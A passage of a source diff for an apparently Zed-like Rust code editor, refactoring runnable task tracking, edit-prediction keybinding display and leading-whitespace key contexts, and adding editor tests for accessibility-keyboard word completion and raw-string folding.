-#[derive(Clone, Debug)]
-struct RunnableTasks {
- templates: Vec<(TaskSourceKind, TaskTemplate)>,
- offset: multi_buffer::Anchor,
- // We need the column at which the task context evaluation should take place (when we're spawning it via gutter).
- column: u32,
- // Values of all named captures, including those starting with '_'
- extra_variables: HashMap<String, String>,
- // Full range of the tagged region. We use it to determine which `extra_variables` to grab for context resolution in e.g. a modal.
- context_range: Range<BufferOffset>,
-}
-
-impl RunnableTasks {
- fn resolve<'a>(
- &'a self,
- cx: &'a task::TaskContext,
- ) -> impl Iterator<Item = (TaskSourceKind, ResolvedTask)> + 'a {
- self.templates.iter().filter_map(|(kind, template)| {
- template
- .resolve_task(&kind.to_id_base(), cx)
- .map(|task| (kind.clone(), task))
- })
- }
-}
-
-#[derive(Clone)]
-pub struct ResolvedTasks {
- templates: SmallVec<[(TaskSourceKind, ResolvedTask); 1]>,
- position: Anchor,
-}
-
/// Addons allow storing per-editor state in other crates (e.g. Vim)
pub trait Addon: 'static {
fn extend_key_context(&self, _: &mut KeyContext, _: &App) {}
@@ -1254,8 +1249,7 @@ pub struct Editor {
show_completions_on_input_override: Option<bool>,
menu_edit_predictions_policy: MenuEditPredictionsPolicy,
edit_prediction_preview: EditPredictionPreview,
- edit_prediction_indent_conflict: bool,
- edit_prediction_requires_modifier_in_indent_conflict: bool,
+ in_leading_whitespace: bool,
next_inlay_id: usize,
next_color_inlay_id: usize,
_subscriptions: Vec<Subscription>,
@@ -1294,8 +1288,7 @@ pub struct Editor {
last_bounds: Option<Bounds<Pixels>>,
last_position_map: Option<Rc<PositionMap>>,
expect_bounds_change: Option<Bounds<Pixels>>,
- tasks: BTreeMap<(BufferId, BufferRow), RunnableTasks>,
- tasks_update_task: Option<Task<()>>,
+ runnables: RunnableData,
breakpoint_store: Option<Entity<BreakpointStore>>,
gutter_breakpoint_indicator: (Option<PhantomBreakpointIndicator>, Option<Task<()>>),
pub(crate) gutter_diff_review_indicator: (Option<PhantomDiffReviewIndicator>, Option<Task<()>>),
@@ -1876,6 +1869,7 @@ pub enum MultibufferSelectionMode {
pub struct RewrapOptions {
pub override_language_settings: bool,
pub preserve_existing_whitespace: bool,
+ pub line_length: Option<usize>,
}
impl Editor {
@@ -2172,16 +2166,9 @@ impl Editor {
editor.registered_buffers.clear();
editor.register_visible_buffers(cx);
editor.invalidate_semantic_tokens(None);
+ editor.refresh_runnables(None, window, cx);
editor.update_lsp_data(None, window, cx);
editor.refresh_inlay_hints(InlayHintRefreshReason::ServerRemoved, cx);
- if editor.tasks_update_task.is_none() {
- editor.tasks_update_task = Some(editor.refresh_runnables(window, cx));
- }
- }
- project::Event::LanguageServerAdded(..) => {
- if editor.tasks_update_task.is_none() {
- editor.tasks_update_task = Some(editor.refresh_runnables(window, cx));
- }
}
project::Event::SnippetEdit(id, snippet_edits) => {
// todo(lw): Non singletons
@@ -2209,6 +2196,7 @@ impl Editor {
let buffer_id = *buffer_id;
if editor.buffer().read(cx).buffer(buffer_id).is_some() {
editor.register_buffer(buffer_id, cx);
+ editor.refresh_runnables(Some(buffer_id), window, cx);
editor.update_lsp_data(Some(buffer_id), window, cx);
editor.refresh_inlay_hints(InlayHintRefreshReason::NewLinesShown, cx);
refresh_linked_ranges(editor, window, cx);
@@ -2287,7 +2275,7 @@ impl Editor {
&task_inventory,
window,
|editor, _, window, cx| {
- editor.tasks_update_task = Some(editor.refresh_runnables(window, cx));
+ editor.refresh_runnables(None, window, cx);
},
));
};
@@ -2509,8 +2497,7 @@ impl Editor {
show_completions_on_input_override: None,
menu_edit_predictions_policy: MenuEditPredictionsPolicy::ByProvider,
edit_prediction_settings: EditPredictionSettings::Disabled,
- edit_prediction_indent_conflict: false,
- edit_prediction_requires_modifier_in_indent_conflict: true,
+ in_leading_whitespace: false,
custom_context_menu: None,
show_git_blame_gutter: false,
show_git_blame_inline: false,
@@ -2528,7 +2515,6 @@ impl Editor {
}),
blame: None,
blame_subscription: None,
- tasks: BTreeMap::default(),
breakpoint_store,
gutter_breakpoint_indicator: (None, None),
@@ -2564,7 +2550,7 @@ impl Editor {
]
})
.unwrap_or_default(),
- tasks_update_task: None,
+ runnables: RunnableData::new(),
pull_diagnostics_task: Task::ready(()),
colors: None,
refresh_colors_task: Task::ready(()),
@@ -2631,7 +2617,6 @@ impl Editor {
cx.notify();
}));
}
- editor.tasks_update_task = Some(editor.refresh_runnables(window, cx));
editor._subscriptions.extend(project_subscriptions);
editor._subscriptions.push(cx.subscribe_in(
@@ -2659,15 +2644,7 @@ impl Editor {
.await;
editor
.update_in(cx, |editor, window, cx| {
- editor.register_visible_buffers(cx);
- editor.colorize_brackets(false, cx);
- editor.refresh_inlay_hints(
- InlayHintRefreshReason::NewLinesShown,
- cx,
- );
- if !editor.buffer().read(cx).is_singleton() {
- editor.update_lsp_data(None, window, cx);
- }
+ editor.update_data_on_scroll(window, cx)
})
.ok();
});
@@ -2902,12 +2879,17 @@ impl Editor {
}
if has_active_edit_prediction {
- if self.edit_prediction_in_conflict() {
- key_context.add(EDIT_PREDICTION_CONFLICT_KEY_CONTEXT);
- } else {
- key_context.add(EDIT_PREDICTION_KEY_CONTEXT);
- key_context.add("copilot_suggestion");
- }
+ key_context.add(EDIT_PREDICTION_KEY_CONTEXT);
+ key_context.add("copilot_suggestion");
+ }
+
+ if self.in_leading_whitespace {
+ key_context.add("in_leading_whitespace");
+ }
+ if self.edit_prediction_requires_modifier() {
+ key_context.set("edit_prediction_mode", "subtle")
+ } else {
+ key_context.set("edit_prediction_mode", "eager");
}
if self.selection_mark_mode {
@@ -2915,14 +2897,23 @@ impl Editor {
}
let disjoint = self.selections.disjoint_anchors();
- let snapshot = self.snapshot(window, cx);
- let snapshot = snapshot.buffer_snapshot();
- if self.mode == EditorMode::SingleLine
- && let [selection] = disjoint
+ if matches!(
+ &self.mode,
+ EditorMode::SingleLine | EditorMode::AutoHeight { .. }
+ ) && let [selection] = disjoint
&& selection.start == selection.end
- && selection.end.to_offset(snapshot) == snapshot.len()
{
- key_context.add("end_of_input");
+ let snapshot = self.snapshot(window, cx);
+ let snapshot = snapshot.buffer_snapshot();
+ let caret_offset = selection.end.to_offset(snapshot);
+
+ if caret_offset == MultiBufferOffset(0) {
+ key_context.add("start_of_input");
+ }
+
+ if caret_offset == snapshot.len() {
+ key_context.add("end_of_input");
+ }
}
if self.has_any_expanded_diff_hunks(cx) {
@@ -2961,32 +2952,13 @@ impl Editor {
}
}
- pub fn edit_prediction_in_conflict(&self) -> bool {
- if !self.show_edit_predictions_in_menu() {
- return false;
- }
-
- let showing_completions = self
- .context_menu
- .borrow()
- .as_ref()
- .is_some_and(|context| matches!(context, CodeContextMenu::Completions(_)));
-
- showing_completions
- || self.edit_prediction_requires_modifier()
- // Require modifier key when the cursor is on leading whitespace, to allow `tab`
- // bindings to insert tab characters.
- || (self.edit_prediction_requires_modifier_in_indent_conflict && self.edit_prediction_indent_conflict)
- }
-
- pub fn accept_edit_prediction_keybind(
+ fn accept_edit_prediction_keystroke(
&self,
granularity: EditPredictionGranularity,
window: &mut Window,
cx: &mut App,
- ) -> AcceptEditPredictionBinding {
+ ) -> Option<gpui::KeybindingKeystroke> {
let key_context = self.key_context_internal(true, window, cx);
- let in_conflict = self.edit_prediction_in_conflict();
let bindings =
match granularity {
@@ -2999,13 +2971,157 @@ impl Editor {
}
};
- AcceptEditPredictionBinding(bindings.into_iter().rev().find(|binding| {
- !in_conflict
- || binding
- .keystrokes()
- .first()
- .is_some_and(|keystroke| keystroke.modifiers().modified())
- }))
+ bindings
+ .into_iter()
+ .rev()
+ .find_map(|binding| match binding.keystrokes() {
+ [keystroke, ..] => Some(keystroke.clone()),
+ _ => None,
+ })
+ }
+
+ fn preview_edit_prediction_keystroke(
+ &self,
+ window: &mut Window,
+ cx: &mut App,
+ ) -> Option<gpui::KeybindingKeystroke> {
+ let key_context = self.key_context_internal(true, window, cx);
+ let bindings = window.bindings_for_action_in_context(&AcceptEditPrediction, key_context);
+ bindings
+ .into_iter()
+ .rev()
+ .find_map(|binding| match binding.keystrokes() {
+ [keystroke, ..] if keystroke.modifiers().modified() => Some(keystroke.clone()),
+ _ => None,
+ })
+ }
+
+ fn edit_prediction_preview_modifiers_held(
+ &self,
+ modifiers: &Modifiers,
+ window: &mut Window,
+ cx: &mut App,
+ ) -> bool {
+ let key_context = self.key_context_internal(true, window, cx);
+ let actions: [&dyn Action; 3] = [
+ &AcceptEditPrediction,
+ &AcceptNextWordEditPrediction,
+ &AcceptNextLineEditPrediction,
+ ];
+
+ actions.into_iter().any(|action| {
+ window
+ .bindings_for_action_in_context(action, key_context.clone())
+ .into_iter()
+ .rev()
+ .any(|binding| {
+ binding.keystrokes().first().is_some_and(|keystroke| {
+ keystroke.modifiers().modified() && keystroke.modifiers() == modifiers
+ })
+ })
+ })
+ }
+
+ fn edit_prediction_cursor_popover_prefers_preview(
+ &self,
+ completion: &EditPredictionState,
+ ) -> bool {
+ match &completion.completion {
+ EditPrediction::Edit {
+ edits, snapshot, ..
+ } => {
+ let mut start_row: Option<u32> = None;
+ let mut end_row: Option<u32> = None;
+
+ for (range, text) in edits {
+ let edit_start_row = range.start.text_anchor.to_point(snapshot).row;
+ let old_end_row = range.end.text_anchor.to_point(snapshot).row;
+ let inserted_newline_count = text
+ .as_ref()
+ .chars()
+ .filter(|character| *character == '\n')
+ .count() as u32;
+ let deleted_newline_count = old_end_row - edit_start_row;
+ let preview_end_row = edit_start_row + inserted_newline_count;
+
+ start_row =
+ Some(start_row.map_or(edit_start_row, |row| row.min(edit_start_row)));
+ end_row = Some(end_row.map_or(preview_end_row, |row| row.max(preview_end_row)));
+
+ if deleted_newline_count > 1 {
+ end_row = Some(end_row.map_or(old_end_row, |row| row.max(old_end_row)));
+ }
+ }
+
+ start_row
+ .zip(end_row)
+ .is_some_and(|(start_row, end_row)| end_row > start_row)
+ }
+ EditPrediction::MoveWithin { .. } | EditPrediction::MoveOutside { .. } => false,
+ }
+ }
+
+ fn edit_prediction_keybind_display(
+ &self,
+ surface: EditPredictionKeybindSurface,
+ window: &mut Window,
+ cx: &mut App,
+ ) -> EditPredictionKeybindDisplay {
+ let accept_keystroke =
+ self.accept_edit_prediction_keystroke(EditPredictionGranularity::Full, window, cx);
+ let preview_keystroke = self.preview_edit_prediction_keystroke(window, cx);
+
+ let action = match surface {
+ EditPredictionKeybindSurface::Inline
+ | EditPredictionKeybindSurface::CursorPopoverCompact => {
+ if self.edit_prediction_requires_modifier() {
+ EditPredictionKeybindAction::Preview
+ } else {
+ EditPredictionKeybindAction::Accept
+ }
+ }
+ EditPredictionKeybindSurface::CursorPopoverExpanded => self
+ .active_edit_prediction
+ .as_ref()
+ .filter(|completion| {
+ self.edit_prediction_cursor_popover_prefers_preview(completion)
+ })
+ .map_or(EditPredictionKeybindAction::Accept, |_| {
+ EditPredictionKeybindAction::Preview
+ }),
+ };
+ #[cfg(test)]
+ let preview_copy = preview_keystroke.clone();
+ #[cfg(test)]
+ let accept_copy = accept_keystroke.clone();
+
+ let displayed_keystroke = match surface {
+ EditPredictionKeybindSurface::Inline => match action {
+ EditPredictionKeybindAction::Accept => accept_keystroke,
+ EditPredictionKeybindAction::Preview => preview_keystroke,
+ },
+ EditPredictionKeybindSurface::CursorPopoverCompact
+ | EditPredictionKeybindSurface::CursorPopoverExpanded => match action {
+ EditPredictionKeybindAction::Accept => accept_keystroke,
+ EditPredictionKeybindAction::Preview => {
+ preview_keystroke.or_else(|| accept_keystroke.clone())
+ }
+ },
+ };
+
+ let missing_accept_keystroke = displayed_keystroke.is_none();
+
+ EditPredictionKeybindDisplay {
+ #[cfg(test)]
+ accept_keystroke: accept_copy,
+ #[cfg(test)]
+ preview_keystroke: preview_copy,
+ displayed_keystroke,
+ action,
+ missing_accept_keystroke,
+ show_hold_label: matches!(surface, EditPredictionKeybindSurface::CursorPopoverCompact)
+ && self.edit_prediction_preview.released_too_fast(),
+ }
}
pub fn new_file(
@@ -3642,7 +3758,6 @@ impl Editor {
self.refresh_matching_bracket_highlights(&display_map, cx);
self.refresh_outline_symbols_at_cursor(cx);
self.update_visible_edit_prediction(window, cx);
- self.edit_prediction_requires_modifier_in_indent_conflict = true;
self.inline_blame_popover.take();
if self.git_blame_inline_enabled {
self.start_inline_blame_timer(window, cx);
@@ -3684,6 +3799,7 @@ impl Editor {
let selections = selections.clone();
let background_executor = cx.background_executor().clone();
let editor_id = cx.entity().entity_id().as_u64() as ItemId;
+ let db = EditorDb::global(cx);
self.serialize_selections = cx.background_spawn(async move {
background_executor.timer(SERIALIZATION_THROTTLE_TIME).await;
let db_selections = selections
@@ -3696,7 +3812,7 @@ impl Editor {
})
.collect();
- DB.save_editor_selections(editor_id, workspace_id, db_selections)
+ db.save_editor_selections(editor_id, workspace_id, db_selections)
.await
.with_context(|| {
format!(
@@ -3781,16 +3897,17 @@ impl Editor {
(start, end, start_fp, end_fp)
})
.collect::<Vec<_>>();
+ let db = EditorDb::global(cx);
self.serialize_folds = cx.background_spawn(async move {
background_executor.timer(SERIALIZATION_THROTTLE_TIME).await;
if db_folds.is_empty() {
// No folds - delete any persisted folds for this file
- DB.delete_file_folds(workspace_id, file_path)
+ db.delete_file_folds(workspace_id, file_path)
.await
.with_context(|| format!("deleting file folds for workspace {workspace_id:?}"))
.log_err();
} else {
- DB.save_file_folds(workspace_id, file_path, db_folds)
+ db.save_file_folds(workspace_id, file_path, db_folds)
.await
.with_context(|| {
format!("persisting file folds for workspace {workspace_id:?}")
@@ -5034,6 +5151,7 @@ impl Editor {
RewrapOptions {
override_language_settings: true,
preserve_existing_whitespace: true,
+ line_length: None,
},
cx,
)
@@ -5790,18 +5908,11 @@ impl Editor {
let display_snapshot = self.display_map.update(cx, |map, cx| map.snapshot(cx));
let multi_buffer = self.buffer().read(cx);
let multi_buffer_snapshot = multi_buffer.snapshot(cx);
- let multi_buffer_visible_start = self
- .scroll_manager
- .native_anchor(&display_snapshot, cx)
- .anchor
- .to_point(&multi_buffer_snapshot);
- let multi_buffer_visible_end = multi_buffer_snapshot.clip_point(
- multi_buffer_visible_start
- + Point::new(self.visible_line_count().unwrap_or(0.).ceil() as u32, 0),
- Bias::Left,
- );
multi_buffer_snapshot
- .range_to_buffer_ranges(multi_buffer_visible_start..=multi_buffer_visible_end)
+ .range_to_buffer_ranges(
+ self.multi_buffer_visible_range(&display_snapshot, cx)
+ .to_inclusive(),
+ )
.into_iter()
.filter(|(_, excerpt_visible_range, _)| !excerpt_visible_range.is_empty())
.filter_map(|(buffer, excerpt_visible_range, excerpt_id)| {
@@ -6534,6 +6645,7 @@ impl Editor {
.selections
.all::<MultiBufferOffset>(&self.display_snapshot(cx));
let mut ranges = Vec::new();
+ let mut all_commit_ranges = Vec::new();
let mut linked_edits = LinkedEdits::new();
let text: Arc<str> = new_text.clone().into();
@@ -6559,10 +6671,12 @@ impl Editor {
ranges.push(range.clone());
+ let start_anchor = snapshot.anchor_before(range.start);
+ let end_anchor = snapshot.anchor_after(range.end);
+ let anchor_range = start_anchor.text_anchor..end_anchor.text_anchor;
+ all_commit_ranges.push(anchor_range.clone());
+
if !self.linked_edit_ranges.is_empty() {
- let start_anchor = snapshot.anchor_before(range.start);
- let end_anchor = snapshot.anchor_after(range.end);
- let anchor_range = start_anchor.text_anchor..end_anchor.text_anchor;
linked_edits.push(&self, anchor_range, text.clone(), cx);
}
}
@@ -6649,6 +6763,7 @@ impl Editor {
completions_menu.completions.clone(),
candidate_id,
true,
+ all_commit_ranges,
cx,
);
@@ -6736,8 +6851,8 @@ impl Editor {
};
let buffer_id = buffer.read(cx).remote_id();
let tasks = self
- .tasks
- .get(&(buffer_id, buffer_row))
+ .runnables
+ .runnables((buffer_id, buffer_row))
.map(|t| Arc::new(t.to_owned()));
if !self.focus_handle.is_focused(window) {
@@ -7732,7 +7847,7 @@ impl Editor {
#[ztracing::instrument(skip_all)]
fn refresh_outline_symbols_at_cursor(&mut self, cx: &mut Context<Editor>) {
- if !self.mode.is_full() {
+ if !self.lsp_data_enabled() {
return;
}
let cursor = self.selections.newest_anchor().head();
@@ -7788,24 +7903,13 @@ impl Editor {
self.debounced_selection_highlight_complete = false;
}
if on_buffer_edit || query_changed {
- let multi_buffer_visible_start = self
- .scroll_manager
- .native_anchor(&display_snapshot, cx)
- .anchor
- .to_point(&multi_buffer_snapshot);
- let multi_buffer_visible_end = multi_buffer_snapshot.clip_point(
- multi_buffer_visible_start
- + Point::new(self.visible_line_count().unwrap_or(0.).ceil() as u32, 0),
- Bias::Left,
- );
- let multi_buffer_visible_range = multi_buffer_visible_start..multi_buffer_visible_end;
self.quick_selection_highlight_task = Some((
query_range.clone(),
self.update_selection_occurrence_highlights(
snapshot.buffer.clone(),
query_text.clone(),
query_range.clone(),
- multi_buffer_visible_range,
+ self.multi_buffer_visible_range(&display_snapshot, cx),
false,
window,
cx,
@@ -7840,6 +7944,27 @@ impl Editor {
}
}
+ pub fn multi_buffer_visible_range(
+ &self,
+ display_snapshot: &DisplaySnapshot,
+ cx: &App,
+ ) -> Range<Point> {
+ let visible_start = self
+ .scroll_manager
+ .native_anchor(display_snapshot, cx)
+ .anchor
+ .to_point(display_snapshot.buffer_snapshot())
+ .to_display_point(display_snapshot);
+
+ let mut target_end = visible_start;
+ *target_end.row_mut() += self.visible_line_count().unwrap_or(0.).ceil() as u32;
+
+ visible_start.to_point(display_snapshot)
+ ..display_snapshot
+ .clip_point(target_end, Bias::Right)
+ .to_point(display_snapshot)
+ }
+
pub fn refresh_edit_prediction(
&mut self,
debounce: bool,
@@ -7847,7 +7972,11 @@ impl Editor {
window: &mut Window,
cx: &mut Context<Self>,
) -> Option<()> {
- let provider = self.edit_prediction_provider()?;
+ if self.leader_id.is_some() {
+ self.discard_edit_prediction(EditPredictionDiscardReason::Ignored, cx);
+ return None;
+ }
+
let cursor = self.selections.newest_anchor().head();
let (buffer, cursor_buffer_position) =
self.buffer.read(cx).text_anchor_for_position(cursor, cx)?;
@@ -7872,7 +8001,8 @@ impl Editor {
return None;
}
- provider.refresh(buffer, cursor_buffer_position, debounce, cx);
+ self.edit_prediction_provider()?
+ .refresh(buffer, cursor_buffer_position, debounce, cx);
Some(())
}
@@ -7997,7 +8127,7 @@ impl Editor {
cx: &App,
) -> bool {
maybe!({
- if self.read_only(cx) {
+ if self.read_only(cx) || self.leader_id.is_some() {
return Some(false);
}
let provider = self.edit_prediction_provider()?;
@@ -8250,8 +8380,6 @@ impl Editor {
}
}
}
-
- self.edit_prediction_requires_modifier_in_indent_conflict = false;
}
pub fn accept_next_word_edit_prediction(
@@ -8403,9 +8531,12 @@ impl Editor {
window: &mut Window,
cx: &mut Context<Self>,
) {
+ self.update_edit_prediction_settings(cx);
+
// Ensure that the edit prediction preview is updated, even when not
// enabled, if there's an active edit prediction preview.
if self.show_edit_predictions_in_menu()
+ || self.edit_prediction_requires_modifier()
|| matches!(
self.edit_prediction_preview,
EditPredictionPreview::Active { .. }
@@ -8423,6 +8554,7 @@ impl Editor {
self.update_hovered_link(
position_map.point_for_position(mouse_position),
+ Some(mouse_position),
&position_map.snapshot,
modifiers,
window,
@@ -8497,25 +8629,7 @@ impl Editor {
window: &mut Window,
cx: &mut Context<Self>,
) {
- let mut modifiers_held = false;
-
- // Check bindings for all granularities.
- // If the user holds the key for Word, Line, or Full, we want to show the preview.
- let granularities = [
- EditPredictionGranularity::Full,
- EditPredictionGranularity::Line,
- EditPredictionGranularity::Word,
- ];
-
- for granularity in granularities {
- if let Some(keystroke) = self
- .accept_edit_prediction_keybind(granularity, window, cx)
- .keystroke()
- {
- modifiers_held = modifiers_held
- || (keystroke.modifiers() == modifiers && keystroke.modifiers().modified());
- }
- }
+ let modifiers_held = self.edit_prediction_preview_modifiers_held(modifiers, window, cx);
if modifiers_held {
if matches!(
@@ -8613,9 +8727,9 @@ impl Editor {
self.edit_prediction_settings =
self.edit_prediction_settings_at_position(&buffer, cursor_buffer_position, cx);
- self.edit_prediction_indent_conflict = multibuffer.is_line_whitespace_upto(cursor);
+ self.in_leading_whitespace = multibuffer.is_line_whitespace_upto(cursor);
- if self.edit_prediction_indent_conflict {
+ if self.in_leading_whitespace {
let cursor_point = cursor.to_point(&multibuffer);
let mut suggested_indent = None;
multibuffer.suggested_indents_callback(
@@ -8630,7 +8744,7 @@ impl Editor {
if let Some(indent) = suggested_indent
&& indent.len == cursor_point.column
{
- self.edit_prediction_indent_conflict = false;
+ self.in_leading_whitespace = false;
}
}
@@ -8808,19 +8922,6 @@ impl Editor {
Some(self.edit_prediction_provider.as_ref()?.provider.clone())
}
- fn clear_tasks(&mut self) {
- self.tasks.clear()
- }
-
- fn insert_tasks(&mut self, key: (BufferId, BufferRow), value: RunnableTasks) {
- if self.tasks.insert(key, value).is_some() {
- // This case should hopefully be rare, but just in case...
- log::error!(
- "multiple different run targets found on a single line, only the last target will be rendered"
- )
- }
- }
-
/// Get all display points of breakpoints that will be rendered within editor
///
/// This function is used to handle overlaps between breakpoints and Code action/runner symbol.
@@ -9198,156 +9299,6 @@ impl Editor {
})
}
- pub fn spawn_nearest_task(
- &mut self,
- action: &SpawnNearestTask,
- window: &mut Window,
- cx: &mut Context<Self>,
- ) {
- let Some((workspace, _)) = self.workspace.clone() else {
- return;
- };
- let Some(project) = self.project.clone() else {
- return;
- };
-
- // Try to find a closest, enclosing node using tree-sitter that has a task
- let Some((buffer, buffer_row, tasks)) = self
- .find_enclosing_node_task(cx)
- // Or find the task that's closest in row-distance.
- .or_else(|| self.find_closest_task(cx))
- else {
- return;
- };
-
- let reveal_strategy = action.reveal;
- let task_context = Self::build_tasks_context(&project, &buffer, buffer_row, &tasks, cx);
- cx.spawn_in(window, async move |_, cx| {
- let context = task_context.await?;
- let (task_source_kind, mut resolved_task) = tasks.resolve(&context).next()?;
-
- let resolved = &mut resolved_task.resolved;
- resolved.reveal = reveal_strategy;
-
- workspace
- .update_in(cx, |workspace, window, cx| {
- workspace.schedule_resolved_task(
- task_source_kind,
- resolved_task,
- false,
- window,
- cx,
- );
- })
- .ok()
- })
- .detach();
- }
-
- fn find_closest_task(
- &mut self,
- cx: &mut Context<Self>,
- ) -> Option<(Entity<Buffer>, u32, Arc<RunnableTasks>)> {
- let cursor_row = self
- .selections
- .newest_adjusted(&self.display_snapshot(cx))
- .head()
- .row;
-
- let ((buffer_id, row), tasks) = self
- .tasks
- .iter()
- .min_by_key(|((_, row), _)| cursor_row.abs_diff(*row))?;
-
- let buffer = self.buffer.read(cx).buffer(*buffer_id)?;
- let tasks = Arc::new(tasks.to_owned());
- Some((buffer, *row, tasks))
- }
-
- fn find_enclosing_node_task(
- &mut self,
- cx: &mut Context<Self>,
- ) -> Option<(Entity<Buffer>, u32, Arc<RunnableTasks>)> {
- let snapshot = self.buffer.read(cx).snapshot(cx);
- let offset = self
- .selections
- .newest::<MultiBufferOffset>(&self.display_snapshot(cx))
- .head();
- let mut excerpt = snapshot.excerpt_containing(offset..offset)?;
- let offset = excerpt.map_offset_to_buffer(offset);
- let buffer_id = excerpt.buffer().remote_id();
-
- let layer = excerpt.buffer().syntax_layer_at(offset)?;
- let mut cursor = layer.node().walk();
-
- while cursor.goto_first_child_for_byte(offset.0).is_some() {
- if cursor.node().end_byte() == offset.0 {
- cursor.goto_next_sibling();
- }
- }
-
- // Ascend to the smallest ancestor that contains the range and has a task.
- loop {
- let node = cursor.node();
- let node_range = node.byte_range();
- let symbol_start_row = excerpt.buffer().offset_to_point(node.start_byte()).row;
-
- // Check if this node contains our offset
- if node_range.start <= offset.0 && node_range.end >= offset.0 {
- // If it contains offset, check for task
- if let Some(tasks) = self.tasks.get(&(buffer_id, symbol_start_row)) {
- let buffer = self.buffer.read(cx).buffer(buffer_id)?;
- return Some((buffer, symbol_start_row, Arc::new(tasks.to_owned())));
- }
- }
-
- if !cursor.goto_parent() {
- break;
- }
- }
- None
- }
-
- fn render_run_indicator(
- &self,
- _style: &EditorStyle,
- is_active: bool,
- row: DisplayRow,
- breakpoint: Option<(Anchor, Breakpoint, Option<BreakpointSessionState>)>,
- cx: &mut Context<Self>,
- ) -> IconButton {
- let color = Color::Muted;
- let position = breakpoint.as_ref().map(|(anchor, _, _)| *anchor);
-
- IconButton::new(
- ("run_indicator", row.0 as usize),
- ui::IconName::PlayOutlined,
- )
- .shape(ui::IconButtonShape::Square)
- .icon_size(IconSize::XSmall)
- .icon_color(color)
- .toggle_state(is_active)
- .on_click(cx.listener(move |editor, e: &ClickEvent, window, cx| {
- let quick_launch = match e {
- ClickEvent::Keyboard(_) => true,
- ClickEvent::Mouse(e) => e.down.button == MouseButton::Left,
- };
-
- window.focus(&editor.focus_handle(cx), cx);
- editor.toggle_code_actions(
- &ToggleCodeActions {
- deployed_from: Some(CodeActionSource::RunMenu(row)),
- quick_launch,
- },
- window,
- cx,
- );
- }))
- .on_right_click(cx.listener(move |editor, event: &ClickEvent, window, cx| {
- editor.set_breakpoint_context_menu(row, position, event.position(), window, cx);
- }))
- }
-
pub fn context_menu_visible(&self) -> bool {
!self.edit_prediction_preview_is_active()
&& self
@@ -5,6 +5,7 @@ use crate::{
edit_prediction_tests::FakeEditPredictionDelegate,
element::StickyHeader,
linked_editing_ranges::LinkedEditingRanges,
+ runnables::RunnableTasks,
scroll::scroll_amount::ScrollAmount,
test::{
assert_text_with_selections, build_editor, editor_content_with_blocks,
@@ -25,7 +26,7 @@ use language::{
BracketPairConfig,
Capability::ReadWrite,
DiagnosticSourceKind, FakeLspAdapter, IndentGuideSettings, LanguageConfig,
- LanguageConfigOverride, LanguageMatcher, LanguageName, Override, Point,
+ LanguageConfigOverride, LanguageMatcher, LanguageName, LanguageQueries, Override, Point,
language_settings::{
CompletionSettingsContent, FormatterList, LanguageSettingsContent, LspInsertMode,
},
@@ -50,6 +51,7 @@ use settings::{
IndentGuideBackgroundColoring, IndentGuideColoring, InlayHintSettingsContent,
ProjectSettingsContent, SearchSettingsContent, SettingsContent, SettingsStore,
};
+use std::borrow::Cow;
use std::{cell::RefCell, future::Future, rc::Rc, sync::atomic::AtomicBool, time::Instant};
use std::{
iter,
@@ -318,6 +320,71 @@ fn test_undo_redo_with_selection_restoration(cx: &mut TestAppContext) {
});
}
+#[gpui::test]
+fn test_accessibility_keyboard_word_completion(cx: &mut TestAppContext) {
+ init_test(cx, |_| {});
+
+ // Simulates the macOS Accessibility Keyboard word completion panel, which calls
+ // insertText:replacementRange: to commit a completion. macOS sends two calls per
+ // completion: one with a non-empty range replacing the typed prefix, and one with
+ // an empty replacement range (cursor..cursor) to append a trailing space.
+
+ cx.add_window(|window, cx| {
+ let buffer = MultiBuffer::build_simple("ab", cx);
+ let mut editor = build_editor(buffer, window, cx);
+
+ // Cursor is after the 2-char prefix "ab" at offset 2.
+ editor.change_selections(SelectionEffects::no_scroll(), window, cx, |s| {
+ s.select_ranges([MultiBufferOffset(2)..MultiBufferOffset(2)])
+ });
+
+ // macOS completes "about" by replacing the prefix via range 0..2.
+ editor.replace_text_in_range(Some(0..2), "about", window, cx);
+ assert_eq!(editor.text(cx), "about");
+
+ // macOS sends a trailing space as an empty replacement range (cursor..cursor).
+ // Must insert at the cursor position, not call backspace first (which would
+ // delete the preceding character).
+ editor.replace_text_in_range(Some(5..5), " ", window, cx);
+ assert_eq!(editor.text(cx), "about ");
+
+ editor
+ });
+
+ // Multi-cursor: the replacement must fan out to all cursors, and the trailing
+ // space must land at each cursor's actual current position. After the first
+ // completion, macOS's reported cursor offset is stale (it doesn't account for
+ // the offset shift caused by the other cursor's insertion), so the empty
+ // replacement range must be ignored and the space inserted at each real cursor.
+ cx.add_window(|window, cx| {
+ // Two cursors, each after a 2-char prefix "ab" at the end of each line:
+ // "ab\nab" — cursors at offsets 2 and 5.
+ let buffer = MultiBuffer::build_simple("ab\nab", cx);
+ let mut editor = build_editor(buffer, window, cx);
+
+ editor.change_selections(SelectionEffects::no_scroll(), window, cx, |s| {
+ s.select_ranges([
+ MultiBufferOffset(2)..MultiBufferOffset(2),
+ MultiBufferOffset(5)..MultiBufferOffset(5),
+ ])
+ });
+
+ // macOS reports the newest cursor (offset 5) and sends range 3..5 to
+ // replace its 2-char prefix. selection_replacement_ranges applies the same
+ // delta to fan out to both cursors: 0..2 and 3..5.
+ editor.replace_text_in_range(Some(3..5), "about", window, cx);
+ assert_eq!(editor.text(cx), "about\nabout");
+
+ // Trailing space via empty range. macOS thinks the cursor is at offset 10
+ // (5 - 2 + 7 = 10), but the actual cursors are at 5 and 11. The stale
+ // offset must be ignored and the space inserted at each real cursor position.
+ editor.replace_text_in_range(Some(10..10), " ", window, cx);
+ assert_eq!(editor.text(cx), "about \nabout ");
+
+ editor
+ });
+}
+
#[gpui::test]
fn test_ime_composition(cx: &mut TestAppContext) {
init_test(cx, |_| {});
@@ -1323,6 +1390,105 @@ fn test_fold_action_multiple_line_breaks(cx: &mut TestAppContext) {
});
}
+#[gpui::test]
+async fn test_fold_with_unindented_multiline_raw_string(cx: &mut TestAppContext) {
+ init_test(cx, |_| {});
+
+ let mut cx = EditorTestContext::new(cx).await;
+
+ let language = Arc::new(
+ Language::new(
+ LanguageConfig::default(),
+ Some(tree_sitter_rust::LANGUAGE.into()),
+ )
+ .with_queries(LanguageQueries {
+ overrides: Some(Cow::from(indoc! {"
+ [
+ (string_literal)
+ (raw_string_literal)
+ ] @string
+ [
+ (line_comment)
+ (block_comment)
+ ] @comment.inclusive
+ "})),
+ ..Default::default()
+ })
+ .expect("Could not parse queries"),
+ );
+
+ cx.update_buffer(|buffer, cx| buffer.set_language(Some(language), cx));
+ cx.set_state(indoc! {"
+ fn main() {
+ let s = r#\"
+ a
+ b
+ c
+ \"#;
+ }ˇ
+ "});
+
